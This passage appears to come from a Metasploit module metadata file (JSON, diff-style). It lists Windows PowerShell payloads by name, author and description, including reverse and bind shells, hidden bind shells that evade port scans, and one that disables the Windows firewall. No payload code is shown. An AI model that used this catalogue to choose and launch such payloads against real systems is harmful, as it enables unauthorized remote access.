"payload/cmd/windows/powershell/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/powershell_reverse_tcp": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/powershell_reverse_tcp_ssl": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/powershell/shell/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Windows Command Shell, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/shell/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. 
This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/shell/bind_hidden_tcp": { - "name": "Powershell Exec, Windows Command Shell, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/shell/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/shell/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/shell/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": 
"payload/cmd/windows/powershell/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/shell/bind_named_pipe": { - "name": "Powershell Exec, Windows Command Shell, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/powershell/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/shell/bind_nonx_tcp": { - "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/shell/bind_tcp": { - "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape 
" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/shell/bind_tcp_rc4": { - "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": 
"windows/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/shell/bind_tcp_uuid": { - "name": "Powershell Exec, Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/shell/find_tag": { - "name": "Powershell Exec, Windows Command Shell, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/find_tag", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/shell/reverse_ipv6_tcp": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/shell/reverse_nonx_tcp": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP 
Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/shell/reverse_ord_tcp": { - "name": "Powershell Exec, Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_ord_tcp", 
- "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp_allports": { - "name": "Powershell Exec, Windows Command Shell, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 
payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp_dns": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - 
"adapted_refname": "windows/shell/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp_rc4": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell 
(staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/shell/reverse_tcp_uuid": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/shell", 
- "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/shell/reverse_udp": { - "name": "Powershell Exec, Windows Command Shell, Reverse UDP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/shell/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "spoonm ", - "sf ", - "RageLtMan " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell/reverse_udp", - "staged": true, - "stage_refname": "windows/shell", - "stager_refname": "windows/reverse_udp" - }, - "payload_cmd/windows/powershell/shell_bind_tcp": { - "name": "Powershell Exec, Windows Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/powershell/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/shell_bind_tcp_xpfw": { - "name": "Powershell Exec, Windows Disable Windows ICF, Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/powershell/shell_bind_tcp_xpfw", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Lin0xx " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nDisable the Windows ICF, then listen for a connection and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell_bind_tcp_xpfw", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell_bind_tcp_xpfw", - "staged": false - }, - "payload_cmd/windows/powershell/shell_hidden_bind_tcp": { - "name": "Powershell Exec, Windows Command Shell, Hidden Bind TCP Inline", - "fullname": "payload/cmd/windows/powershell/shell_hidden_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sd", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via 
PowerShell.\n\nListen for a connection from certain IP and spawn a command shell.\nThe shellcode will reply with a RST packet if the connections is not\ncoming from the IP defined in AHOST. This way the port will appear\nas \"closed\" helping us to hide the shellcode.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/shell_hidden_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/shell_hidden_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/shell_reverse_tcp": { - "name": "Powershell Exec, Windows Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/powershell/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via 